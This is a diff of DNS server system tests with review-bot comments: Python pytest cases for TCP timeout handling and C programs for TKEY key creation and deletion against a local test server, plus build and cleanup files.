--- /dev/null
+++ b/bin/tests/system/timeouts/tests_tcp_timeouts.py
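Review bot: The zone generator in setup.sh, `$PYTHON -c "..." > ns1/large.db`, has no status check, so a failed or interrupted interpreter leaves an empty or truncated `ns1/large.db` that example.db then pulls in through `$INCLUDE large.db`. The timeout tests would fail later for a reason that has nothing to do with named's timers. Ending the command with `> ns1/large.db || exit 1` reports the problem where it happens, assuming the test runner honours setup.sh's exit status. The comment above the generator could also state the resulting size (128 TXT strings of 240 bytes plus 300000 NS records), since test_send_timeout depends on the TXT answer being about 32k.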
@@ -0,0 +1,284 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# pylint: disable=unused-variable + +import socket +import time + +import pytest + +pytest.importorskip("dns", minversion="2.0.0") +import dns.edns +import dns.message +import dns.name +import dns.query +import dns.rdataclass +import dns.rdatatype + +import pytest_custom_markers # pylint: disable=import-error + + +TIMEOUT = 10 + + +def create_msg(qname, qtype): + msg = dns.message.make_query( + qname, qtype, want_dnssec=True, use_edns=0, payload=4096 + ) + return msg + + +def timeout(): + return time.time() + TIMEOUT + + +def test_initial_timeout(named_port): + # + # The initial timeout is 2.5 seconds, so this should timeout + # + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + time.sleep(3) + + msg = create_msg("example.", "A") + + with pytest.raises(EOFError): + try: + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + except ConnectionError as e: + raise EOFError from e + + +def test_idle_timeout(named_port): + # + # The idle timeout is 5 seconds, so the third message should fail + # + msg = create_msg("example.", "A") + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + time.sleep(1) + + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + time.sleep(2) + + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = 
dns.query.receive_tcp(sock, timeout()) + + time.sleep(6) + + with pytest.raises(EOFError): + try: + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + except ConnectionError as e: + raise EOFError from e + + +def test_keepalive_timeout(named_port): + # + # Keepalive is 7 seconds, so the third message should succeed. + # + msg = create_msg("example.", "A") + kopt = dns.edns.GenericOption(11, b"\x00") + msg.use_edns(edns=True, payload=4096, options=[kopt]) + + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + time.sleep(1) + + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + time.sleep(2) + + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + time.sleep(6) + + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + +def test_pipelining_timeout(named_port): + # + # The pipelining should only timeout after the last message is received + # + msg = create_msg("example.", "A") + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + time.sleep(1) + + # Send and receive 25 DNS queries + for n in range(25): + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + for n in range(25): + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + time.sleep(3) + + # Send and receive 25 DNS queries + for n in range(25): + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + for n in range(25): + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + time.sleep(6) + + with pytest.raises(EOFError): + try: + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + except ConnectionError as e: + 
raise EOFError from e + + +def test_long_axfr(named_port): + # + # The timers should not fire during AXFR, thus the connection should not + # close abruptly + # + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + name = dns.name.from_text("example.") + msg = create_msg("example.", "AXFR") + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + + # Receive the initial DNS message with SOA + (response, rtime) = dns.query.receive_tcp( + sock, timeout(), one_rr_per_rrset=True + ) + soa = response.get_rrset( + dns.message.ANSWER, name, dns.rdataclass.IN, dns.rdatatype.SOA + ) + assert soa is not None + + # Pull DNS message from wire until the second SOA is received + while True: + (response, rtime) = dns.query.receive_tcp( + sock, timeout(), one_rr_per_rrset=True + ) + soa = response.get_rrset( + dns.message.ANSWER, name, dns.rdataclass.IN, dns.rdatatype.SOA + ) + if soa is not None: + break + assert soa is not None + + +# This test relies on the maximum socket send buffer size (wmem_max) being set +# to 212992 bytes (the typical default value on Linux systems). Environments +# that use a different value for this setting (for example, FreeBSD defaults to +# 32768 bytes) may need their system-level settings to be tweaked in order for +# this test to pass. 
+@pytest_custom_markers.flaky(max_runs=3) +def test_send_timeout(named_port): + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + # Send and receive single large RDATA over TCP + msg = create_msg("large.example.", "TXT") + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + # Send and receive 28 large (~32k) DNS queries that should + # fill the default maximum 208k TCP send buffer + for n in range(28): + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + + # configure idle interval is 5 seconds, sleep 6 to make sure we are + # above the interval + time.sleep(6) + + with pytest.raises(EOFError): + try: + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + except ConnectionError as e: + raise EOFError from e + + +@pytest_custom_markers.long_test +def test_max_transfer_idle_out(named_port): + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + name = dns.name.from_text("example.") + msg = create_msg("example.", "AXFR") + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + + # Receive the initial DNS message with SOA + (response, rtime) = dns.query.receive_tcp( + sock, timeout(), one_rr_per_rrset=True + ) + soa = response.get_rrset( + dns.message.ANSWER, name, dns.rdataclass.IN, dns.rdatatype.SOA + ) + assert soa is not None + + time.sleep(61) # max-transfer-idle-out is 1 minute + + with pytest.raises(ConnectionResetError): + # Process queued TCP messages + while True: + (response, rtime) = dns.query.receive_tcp( + sock, timeout(), one_rr_per_rrset=True + ) + soa = response.get_rrset( + dns.message.ANSWER, name, dns.rdataclass.IN, dns.rdatatype.SOA + ) + if soa is not None: + break + assert soa is None + + +@pytest_custom_markers.long_test +def test_max_transfer_time_out(named_port): + with 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + name = dns.name.from_text("example.") + msg = create_msg("example.", "AXFR") + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + + # Receive the initial DNS message with SOA + (response, rtime) = dns.query.receive_tcp( + sock, timeout(), one_rr_per_rrset=True + ) + soa = response.get_rrset( + dns.message.ANSWER, name, dns.rdataclass.IN, dns.rdatatype.SOA + ) + assert soa is not None + + # The loop should timeout at the 5 minutes (max-transfer-time-out) + with pytest.raises(EOFError): + while True: + time.sleep(1) + (response, rtime) = dns.query.receive_tcp( + sock, timeout(), one_rr_per_rrset=True + ) + soa = response.get_rrset( + dns.message.ANSWER, name, dns.rdataclass.IN, dns.rdatatype.SOA + ) + if soa is not None: + break + assert soa is None diff --git a/bin/tests/system/tkey/Makefile.in b/bin/tests/system/tkey/Makefile.in new file mode 100644 index 0000000..1e62132 --- /dev/null +++ b/bin/tests/system/tkey/Makefile.in 
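Review bot: The block that expects named to have dropped the connection (`with pytest.raises(EOFError):` around a send/receive pair that remaps `ConnectionError`) is copied verbatim into test_initial_timeout, test_idle_timeout, test_pipelining_timeout and test_send_timeout, and nothing explains why both exceptions count as success. A small helper documents that once and lets those tests drop the unused tuple unpacking that forces the file-wide `# pylint: disable=unused-variable`. Separately, `dns.edns.GenericOption(11, b"\x00")` in test_keepalive_timeout deserves a comment naming option code 11 as edns-tcp-keepalive.

```python
def expect_connection_closed(sock, msg):
    # A connection the server timed out may surface as EOF (clean close)
    # or as a ConnectionError (reset); either means the timer fired.
    with pytest.raises(EOFError):
        try:
            dns.query.send_tcp(sock, msg, timeout())
            dns.query.receive_tcp(sock, timeout())
        except ConnectionError as e:
            raise EOFError from e


def test_initial_timeout(named_port):
    # ... unchanged: connect, sleep past the initial timeout, build msg ...
        expect_connection_closed(sock, msg)
```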
@@ -0,0 +1,55 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+srcdir = @srcdir@
+VPATH = @srcdir@
+top_srcdir = @top_srcdir@
+
+VERSION=@BIND9_VERSION@
+
+@BIND9_MAKE_INCLUDES@
+
+CINCLUDES = ${DNS_INCLUDES} ${ISC_INCLUDES} \
+ ${OPENSSL_CFLAGS}
+
+CDEFINES =
+CWARNINGS =
+
+DNSLIBS = ../../../../lib/dns/libdns.@A@ @NO_LIBTOOL_DNSLIBS@
+ISCLIBS = ../../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@
+
+DNSDEPLIBS = ../../../../lib/dns/libdns.@A@
+ISCDEPLIBS = ../../../../lib/isc/libisc.@A@
+
+DEPLIBS = ${DNSDEPLIBS} ${ISCDEPLIBS}
+
+LIBS = ${DNSLIBS} ${ISCLIBS} @LIBS@
+
+TARGETS = keycreate@EXEEXT@ keydelete@EXEEXT@
+
+CREATEOBJS = keycreate.@O@
+DELETEOBJS = keydelete.@O@
+
+SRCS = keycreate.c keydelete.c
+
+@BIND9_MAKE_RULES@
+
+all: keycreate@EXEEXT@ keydelete@EXEEXT@
+
+keycreate@EXEEXT@: ${CREATEOBJS} ${DEPLIBS}
+ ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ ${CREATEOBJS} ${LIBS}
+
+keydelete@EXEEXT@: ${DELETEOBJS} ${DEPLIBS}
+ ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ ${DELETEOBJS} ${LIBS}
+
+clean distclean::
+ rm -f ${TARGETS}
+
diff --git a/bin/tests/system/tkey/clean.sh b/bin/tests/system/tkey/clean.sh
new file mode 100644
index 0000000..ac54e79
--- /dev/null
+++ b/bin/tests/system/tkey/clean.sh
@@ -0,0 +1,20 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.out.* rndc.out.* ns1/named.conf
+rm -f K* ns1/K*
+rm -f */named.memstats
+rm -f */named.run
+rm -f ns1/_default.tsigkeys
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/tkey/keycreate.c b/bin/tests/system/tkey/keycreate.c
new file mode 100644
index 0000000..c62fec1
--- /dev/null
+++ b/bin/tests/system/tkey/keycreate.c
@@ -0,0 +1,301 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#include <stdlib.h> +#include <string.h> + +#include <isc/app.h> +#include <isc/base64.h> +#include <isc/hash.h> +#include <isc/log.h> +#include <isc/managers.h> +#include <isc/mem.h> +#include <isc/nonce.h> +#include <isc/print.h> +#include <isc/random.h> +#include <isc/sockaddr.h> +#include <isc/socket.h> +#include <isc/task.h> +#include <isc/timer.h> +#include <isc/util.h> + +#include <pk11/site.h> + +#include <dns/dispatch.h> +#include <dns/fixedname.h> +#include <dns/keyvalues.h> +#include <dns/message.h> +#include <dns/name.h> +#include <dns/request.h> +#include <dns/result.h> +#include <dns/tkey.h> +#include <dns/tsig.h> +#include <dns/view.h> + +#include <dst/result.h> + +#define CHECK(str, x) \ + { \ + if ((x) != ISC_R_SUCCESS) { \ + fprintf(stderr, "I:%s: %s\n", (str), \ + isc_result_totext(x)); \ + exit(-1); \ + } \ + } + +#define RUNCHECK(x) RUNTIME_CHECK((x) == ISC_R_SUCCESS) + +#define PORT 5300 +#define TIMEOUT 30 + +static dst_key_t *ourkey = NULL; +static isc_mem_t *mctx = NULL; +static dns_tsigkey_t *tsigkey = NULL, *initialkey = NULL; +static dns_tsig_keyring_t *ring = NULL; +static unsigned char noncedata[16]; +static isc_buffer_t nonce; +static dns_requestmgr_t *requestmgr = NULL; +static const char *ownername_str = "."; + +static void +recvquery(isc_task_t *task, isc_event_t *event) { + dns_requestevent_t *reqev = (dns_requestevent_t *)event; + isc_result_t result; + dns_message_t *query = NULL, *response = NULL; + char keyname[256]; + isc_buffer_t keynamebuf; + int type; + + UNUSED(task); + 
+ REQUIRE(reqev != NULL); + + if (reqev->result != ISC_R_SUCCESS) { + fprintf(stderr, "I:request event result: %s\n", + isc_result_totext(reqev->result)); + exit(-1); + } + + query = reqev->ev_arg; + + dns_message_create(mctx, DNS_MESSAGE_INTENTPARSE, &response); + + result = dns_request_getresponse(reqev->request, response, + DNS_MESSAGEPARSE_PRESERVEORDER); + CHECK("dns_request_getresponse", result); + + if (response->rcode != dns_rcode_noerror) { + result = ISC_RESULTCLASS_DNSRCODE + response->rcode; + fprintf(stderr, "I:response rcode: %s\n", + isc_result_totext(result)); + exit(-1); + } + + result = dns_tkey_processdhresponse(query, response, ourkey, &nonce, + &tsigkey, ring); + CHECK("dns_tkey_processdhresponse", result); + + /* + * Yes, this is a hack. + */ + isc_buffer_init(&keynamebuf, keyname, sizeof(keyname)); + result = dst_key_buildfilename(tsigkey->key, 0, "", &keynamebuf); + CHECK("dst_key_buildfilename", result); + printf("%.*s\n", (int)isc_buffer_usedlength(&keynamebuf), + (char *)isc_buffer_base(&keynamebuf)); + type = DST_TYPE_PRIVATE | DST_TYPE_PUBLIC | DST_TYPE_KEY; + result = dst_key_tofile(tsigkey->key, type, ""); + CHECK("dst_key_tofile", result); + + dns_message_detach(&query); + dns_message_detach(&response); + dns_request_destroy(&reqev->request); + isc_event_free(&event); + isc_app_shutdown(); + return; +} + +static void +sendquery(isc_task_t *task, isc_event_t *event) { + struct in_addr inaddr; + isc_sockaddr_t address; + isc_region_t r; + isc_result_t result; + dns_fixedname_t keyname; + dns_fixedname_t ownername; + isc_buffer_t namestr, keybuf; + unsigned char keydata[9]; + dns_message_t *query = NULL; + dns_request_t *request = NULL; + static char keystr[] = "0123456789ab"; + + isc_event_free(&event); + + result = ISC_R_FAILURE; + if (inet_pton(AF_INET, "10.53.0.1", &inaddr) != 1) { + CHECK("inet_pton", result); + } + isc_sockaddr_fromin(&address, &inaddr, PORT); + + dns_fixedname_init(&keyname); + isc_buffer_constinit(&namestr, 
"tkeytest.", 9); + isc_buffer_add(&namestr, 9); + result = dns_name_fromtext(dns_fixedname_name(&keyname), &namestr, NULL, + 0, NULL); + CHECK("dns_name_fromtext", result); + + dns_fixedname_init(&ownername); + isc_buffer_constinit(&namestr, ownername_str, strlen(ownername_str)); + isc_buffer_add(&namestr, strlen(ownername_str)); + result = dns_name_fromtext(dns_fixedname_name(&ownername), &namestr, + NULL, 0, NULL); + CHECK("dns_name_fromtext", result); + + isc_buffer_init(&keybuf, keydata, 9); + result = isc_base64_decodestring(keystr, &keybuf); + CHECK("isc_base64_decodestring", result); + + isc_buffer_usedregion(&keybuf, &r); + + result = dns_tsigkey_create( + dns_fixedname_name(&keyname), DNS_TSIG_HMACMD5_NAME, + isc_buffer_base(&keybuf), isc_buffer_usedlength(&keybuf), false, + NULL, 0, 0, mctx, ring, &initialkey); + CHECK("dns_tsigkey_create", result); + + dns_message_create(mctx, DNS_MESSAGE_INTENTRENDER, &query); + + result = dns_tkey_builddhquery(query, ourkey, + dns_fixedname_name(&ownername), + DNS_TSIG_HMACMD5_NAME, &nonce, 3600); + CHECK("dns_tkey_builddhquery", result); + + result = dns_request_create(requestmgr, query, &address, + DNS_REQUESTOPT_TCP, initialkey, TIMEOUT, + task, recvquery, query, &request); + CHECK("dns_request_create", result); +} + +int +main(int argc, char *argv[]) { + char *ourkeyname = NULL; + isc_nm_t *netmgr = NULL; + isc_taskmgr_t *taskmgr = NULL; + isc_timermgr_t *timermgr = NULL; + isc_socketmgr_t *socketmgr = NULL; + isc_socket_t *sock = NULL; + unsigned int attrs, attrmask; + isc_sockaddr_t bind_any; + dns_dispatchmgr_t *dispatchmgr = NULL; + dns_dispatch_t *dispatchv4 = NULL; + dns_view_t *view = NULL; + dns_tkeyctx_t *tctx = NULL; + isc_log_t *log = NULL; + isc_logconfig_t *logconfig = NULL; + isc_task_t *task = NULL; + isc_result_t result; + int type; + + RUNCHECK(isc_app_start()); + + if (argc < 2) { + fprintf(stderr, "I:no DH key provided\n"); + exit(-1); + } + if (strcmp(argv[1], "-r") == 0) { + fprintf(stderr, 
"I:the -r option has been deprecated\n"); + exit(-1); + } + ourkeyname = argv[1]; + + if (argc >= 3) { + ownername_str = argv[2]; + } + + dns_result_register(); + + isc_mem_debugging = ISC_MEM_DEBUGRECORD; + isc_mem_create(&mctx); + + isc_log_create(mctx, &log, &logconfig); + + RUNCHECK(dst_lib_init(mctx, NULL)); + + RUNCHECK(isc_managers_create(mctx, 1, 0, &netmgr, &taskmgr)); + RUNCHECK(isc_task_create(taskmgr, 0, &task)); + RUNCHECK(isc_timermgr_create(mctx, &timermgr)); + RUNCHECK(isc_socketmgr_create(mctx, &socketmgr)); + RUNCHECK(dns_dispatchmgr_create(mctx, &dispatchmgr)); + isc_sockaddr_any(&bind_any); + attrs = DNS_DISPATCHATTR_UDP | DNS_DISPATCHATTR_MAKEQUERY | + DNS_DISPATCHATTR_IPV4; + attrmask = DNS_DISPATCHATTR_UDP | DNS_DISPATCHATTR_TCP | + DNS_DISPATCHATTR_IPV4 | DNS_DISPATCHATTR_IPV6; + RUNCHECK(dns_dispatch_getudp(dispatchmgr, socketmgr, taskmgr, &bind_any, + 4096, 4, 2, 3, 5, attrs, attrmask, + &dispatchv4)); + RUNCHECK(dns_requestmgr_create(mctx, timermgr, socketmgr, taskmgr, + dispatchmgr, dispatchv4, NULL, + &requestmgr)); + + RUNCHECK(dns_tsigkeyring_create(mctx, &ring)); + RUNCHECK(dns_tkeyctx_create(mctx, &tctx)); + + RUNCHECK(dns_view_create(mctx, 0, "_test", &view)); + dns_view_setkeyring(view, ring); + dns_tsigkeyring_detach(&ring); + + RUNCHECK(isc_socket_create(socketmgr, PF_INET, isc_sockettype_udp, + &sock)); + + RUNCHECK(isc_app_onrun(mctx, task, sendquery, NULL)); + + type = DST_TYPE_PUBLIC | DST_TYPE_PRIVATE | DST_TYPE_KEY; + result = dst_key_fromnamedfile(ourkeyname, NULL, type, mctx, &ourkey); + CHECK("dst_key_fromnamedfile", result); + + isc_buffer_init(&nonce, noncedata, sizeof(noncedata)); + isc_nonce_buf(noncedata, sizeof(noncedata)); + isc_buffer_add(&nonce, sizeof(noncedata)); + + (void)isc_app_run(); + + dns_requestmgr_shutdown(requestmgr); + dns_requestmgr_detach(&requestmgr); + dns_dispatch_detach(&dispatchv4); + dns_dispatchmgr_destroy(&dispatchmgr); + isc_task_shutdown(task); + isc_task_detach(&task); + 
isc_managers_destroy(&netmgr, &taskmgr); + isc_socket_detach(&sock); + isc_socketmgr_destroy(&socketmgr); + isc_timermgr_destroy(&timermgr); + + dst_key_free(&ourkey); + dns_tsigkey_detach(&initialkey); + dns_tsigkey_detach(&tsigkey); + + dns_tkeyctx_destroy(&tctx); + + dns_view_detach(&view); + + isc_log_destroy(&log); + + dst_lib_destroy(); + + isc_mem_destroy(&mctx); + + isc_app_finish(); + + return (0); +} diff --git a/bin/tests/system/tkey/keydelete.c b/bin/tests/system/tkey/keydelete.c new file mode 100644 index 0000000..bd67d39 --- /dev/null +++ b/bin/tests/system/tkey/keydelete.c 
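Review bot: In keycreate.c's main(), `dns_tsigkeyring_detach(&ring)` runs right after `dns_view_setkeyring()` and before `isc_app_run()`, yet sendquery() and recvquery() later pass the same file-scope `ring` to `dns_tsigkey_create()` and `dns_tkey_processdhresponse()`. If the detach clears the caller's pointer, as ISC detach helpers normally do, both calls see NULL and neither the initial nor the negotiated key is ever added to the view's keyring. Either move the detach into the teardown after `isc_app_run()` or state the intent with `/* ring is NULL from here on; keys are deliberately not stored in a keyring */`. In sendquery(), the fixed secret `keystr[] = "0123456789ab"` used with `DNS_TSIG_HMACMD5_NAME` should carry a comment marking it as a test-only fixture, and `isc_buffer_init(&keybuf, keydata, sizeof(keydata));` would replace the literal `9`.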
@@ -0,0 +1,242 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#include <stdlib.h> +#include <string.h> + +#include <isc/app.h> +#include <isc/base64.h> +#include <isc/hash.h> +#include <isc/log.h> +#include <isc/managers.h> +#include <isc/mem.h> +#include <isc/print.h> +#include <isc/random.h> +#include <isc/sockaddr.h> +#include <isc/socket.h> +#include <isc/task.h> +#include <isc/timer.h> +#include <isc/util.h> + +#include <pk11/site.h> + +#include <dns/dispatch.h> +#include <dns/fixedname.h> +#include <dns/keyvalues.h> +#include <dns/message.h> +#include <dns/name.h> +#include <dns/request.h> +#include <dns/result.h> +#include <dns/tkey.h> +#include <dns/tsig.h> +#include <dns/view.h> + +#include <dst/result.h> + +#define CHECK(str, x) \ + { \ + if ((x) != ISC_R_SUCCESS) { \ + fprintf(stderr, "I:%s: %s\n", (str), \ + isc_result_totext(x)); \ + exit(-1); \ + } \ + } + +#define RUNCHECK(x) RUNTIME_CHECK((x) == ISC_R_SUCCESS) + +#define PORT 5300 +#define TIMEOUT 30 + +static isc_mem_t *mctx = NULL; +static dns_tsigkey_t *tsigkey = NULL; +static dns_tsig_keyring_t *ring = NULL; +static dns_requestmgr_t *requestmgr = NULL; + +static void +recvquery(isc_task_t *task, isc_event_t *event) { + dns_requestevent_t *reqev = (dns_requestevent_t *)event; + isc_result_t result; + dns_message_t *query = NULL, *response = NULL; + + UNUSED(task); + + REQUIRE(reqev != NULL); + + if (reqev->result != ISC_R_SUCCESS) { + fprintf(stderr, "I:request event result: %s\n", + isc_result_totext(reqev->result)); + exit(-1); + } + + query = reqev->ev_arg; + + dns_message_create(mctx, 
DNS_MESSAGE_INTENTPARSE, &response); + + result = dns_request_getresponse(reqev->request, response, + DNS_MESSAGEPARSE_PRESERVEORDER); + CHECK("dns_request_getresponse", result); + + if (response->rcode != dns_rcode_noerror) { + result = ISC_RESULTCLASS_DNSRCODE + response->rcode; + fprintf(stderr, "I:response rcode: %s\n", + isc_result_totext(result)); + exit(-1); + } + + result = dns_tkey_processdeleteresponse(query, response, ring); + CHECK("dns_tkey_processdhresponse", result); + + dns_message_detach(&query); + dns_message_detach(&response); + dns_request_destroy(&reqev->request); + isc_event_free(&event); + isc_app_shutdown(); + return; +} + +static void +sendquery(isc_task_t *task, isc_event_t *event) { + struct in_addr inaddr; + isc_sockaddr_t address; + isc_result_t result; + dns_message_t *query = NULL; + dns_request_t *request = NULL; + + isc_event_free(&event); + + result = ISC_R_FAILURE; + if (inet_pton(AF_INET, "10.53.0.1", &inaddr) != 1) { + CHECK("inet_pton", result); + } + isc_sockaddr_fromin(&address, &inaddr, PORT); + + dns_message_create(mctx, DNS_MESSAGE_INTENTRENDER, &query); + + result = dns_tkey_builddeletequery(query, tsigkey); + CHECK("dns_tkey_builddeletequery", result); + + result = dns_request_create(requestmgr, query, &address, + DNS_REQUESTOPT_TCP, tsigkey, TIMEOUT, task, + recvquery, query, &request); + CHECK("dns_request_create", result); +} + +int +main(int argc, char **argv) { + char *keyname = NULL; + isc_nm_t *netmgr = NULL; + isc_taskmgr_t *taskmgr = NULL; + isc_timermgr_t *timermgr = NULL; + isc_socketmgr_t *socketmgr = NULL; + isc_socket_t *sock = NULL; + unsigned int attrs, attrmask; + isc_sockaddr_t bind_any; + dns_dispatchmgr_t *dispatchmgr = NULL; + dns_dispatch_t *dispatchv4 = NULL; + dns_view_t *view = NULL; + dns_tkeyctx_t *tctx = NULL; + dst_key_t *dstkey = NULL; + isc_log_t *log = NULL; + isc_logconfig_t *logconfig = NULL; + isc_task_t *task = NULL; + isc_result_t result; + int type; + + RUNCHECK(isc_app_start()); + + 
if (argc < 2) { + fprintf(stderr, "I:no key to delete\n"); + exit(-1); + } + if (strcmp(argv[1], "-r") == 0) { + fprintf(stderr, "I:The -r options has been deprecated\n"); + exit(-1); + } + keyname = argv[1]; + + dns_result_register(); + + isc_mem_create(&mctx); + + isc_log_create(mctx, &log, &logconfig); + + RUNCHECK(dst_lib_init(mctx, NULL)); + + RUNCHECK(isc_managers_create(mctx, 1, 0, &netmgr, &taskmgr)); + RUNCHECK(isc_task_create(taskmgr, 0, &task)); + RUNCHECK(isc_timermgr_create(mctx, &timermgr)); + RUNCHECK(isc_socketmgr_create(mctx, &socketmgr)); + RUNCHECK(dns_dispatchmgr_create(mctx, &dispatchmgr)); + isc_sockaddr_any(&bind_any); + attrs = DNS_DISPATCHATTR_UDP | DNS_DISPATCHATTR_MAKEQUERY | + DNS_DISPATCHATTR_IPV4; + attrmask = DNS_DISPATCHATTR_UDP | DNS_DISPATCHATTR_TCP | + DNS_DISPATCHATTR_IPV4 | DNS_DISPATCHATTR_IPV6; + RUNCHECK(dns_dispatch_getudp(dispatchmgr, socketmgr, taskmgr, &bind_any, + 4096, 4, 2, 3, 5, attrs, attrmask, + &dispatchv4)); + RUNCHECK(dns_requestmgr_create(mctx, timermgr, socketmgr, taskmgr, + dispatchmgr, dispatchv4, NULL, + &requestmgr)); + + RUNCHECK(dns_tsigkeyring_create(mctx, &ring)); + RUNCHECK(dns_tkeyctx_create(mctx, &tctx)); + + RUNCHECK(dns_view_create(mctx, 0, "_test", &view)); + dns_view_setkeyring(view, ring); + + RUNCHECK(isc_socket_create(socketmgr, PF_INET, isc_sockettype_udp, + &sock)); + + RUNCHECK(isc_app_onrun(mctx, task, sendquery, NULL)); + + type = DST_TYPE_PUBLIC | DST_TYPE_PRIVATE | DST_TYPE_KEY; + result = dst_key_fromnamedfile(keyname, NULL, type, mctx, &dstkey); + CHECK("dst_key_fromnamedfile", result); + result = dns_tsigkey_createfromkey(dst_key_name(dstkey), + DNS_TSIG_HMACMD5_NAME, dstkey, true, + NULL, 0, 0, mctx, ring, &tsigkey); + dst_key_free(&dstkey); + CHECK("dns_tsigkey_createfromkey", result); + + (void)isc_app_run(); + + dns_requestmgr_shutdown(requestmgr); + dns_requestmgr_detach(&requestmgr); + dns_dispatch_detach(&dispatchv4); + dns_dispatchmgr_destroy(&dispatchmgr); + 
isc_task_shutdown(task); + isc_task_detach(&task); + isc_managers_destroy(&netmgr, &taskmgr); + isc_socket_detach(&sock); + isc_socketmgr_destroy(&socketmgr); + isc_timermgr_destroy(&timermgr); + + dns_tsigkeyring_detach(&ring); + + dns_tsigkey_detach(&tsigkey); + + dns_tkeyctx_destroy(&tctx); + + dns_view_detach(&view); + + isc_log_destroy(&log); + + dst_lib_destroy(); + + isc_mem_destroy(&mctx); + + isc_app_finish(); + + return (0); +} diff --git a/bin/tests/system/tkey/ns1/example.db b/bin/tests/system/tkey/ns1/example.db new file mode 100644 index 0000000..a847946 --- /dev/null +++ b/bin/tests/system/tkey/ns1/example.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 1D + +@ IN SOA ns hostmaster ( + 1 + 3600 + 1800 + 1814400 + 3 + ) + NS ns +ns A 10.53.0.1 +mx MX 10 mail +a A 10.53.0.1 + A 10.53.0.2 +txt TXT "this is text" + diff --git a/bin/tests/system/tkey/ns1/named.conf.in b/bin/tests/system/tkey/ns1/named.conf.in new file mode 100644 index 0000000..c183880 --- /dev/null +++ b/bin/tests/system/tkey/ns1/named.conf.in 
